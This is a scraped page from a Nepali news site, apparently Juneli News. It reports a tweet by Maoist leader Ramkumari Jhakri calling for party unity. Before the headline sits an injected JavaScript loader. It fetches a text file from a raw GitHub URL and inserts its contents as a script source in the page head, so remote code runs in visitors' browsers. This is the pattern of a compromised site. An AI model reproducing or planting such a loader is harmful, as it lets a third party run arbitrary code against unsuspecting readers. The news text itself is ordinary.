;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ‘दम्भ, अहंकार, घमण्ड, घृणा, तिरस्कार र अपमानलाई पचाएर पार्टी एक बनाउने संकल्प हाम्रो हो’-झाक्री – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ‘दम्भ, अहंकार, घमण्ड, घृणा, तिरस्कार र अपमानलाई पचाएर पार्टी एक बनाउने संकल्प हाम्रो हो’-झाक्री
ट्रेन्डिङ

‘दम्भ, अहंकार, घमण्ड, घृणा, तिरस्कार र अपमानलाई पचाएर पार्टी एक बनाउने संकल्प हाम्रो हो’-झाक्री

चैत १४,

काठमाडौं । नेपाल कम्युनिष्ट पार्टी माओवादीकी नेतृ रामकुमारी झाक्रीले पार्टी एकतालाई कायम गर्नु पर्ने बताएकी छन् ।  उनले भनेकी छन- दम्भ, अहंकार, घमण्ड, घृणा, तिरस्कार र अपमानको बैस चढ्दो छ । त्यसलाई पचाएर पार्टी बनाउने र बचाउने संकल्प हाम्रो हो ।

शनिबार सामाजिक संजाल टुवीट् मार्फत धारण सार्वजनिक गर्दै उनले पार्टीलाई बचाउनु पर्ने बताएकी हुन् । उनले लेखेकी छन्-भित्र र बाहिर दलाल पुँजीवादको बिरुद्धमा लडिरहनुपर्ने हुन्छ । लाखौँ सदस्य, शुभचिन्तक, समर्थक र अग्रजहरूको योगदानले बनेको यो पार्टी र पार्टीको बिरासत, सम्पूर्ण शक्ति र सामर्थ्यका साथ यो आन्दोलनलाई विसर्जन हुनबाट बचाउने हाम्रो युगिन दायित्व हो, लेखेकी हुन् ।

फेसबुक प्रतिक्रियाहरु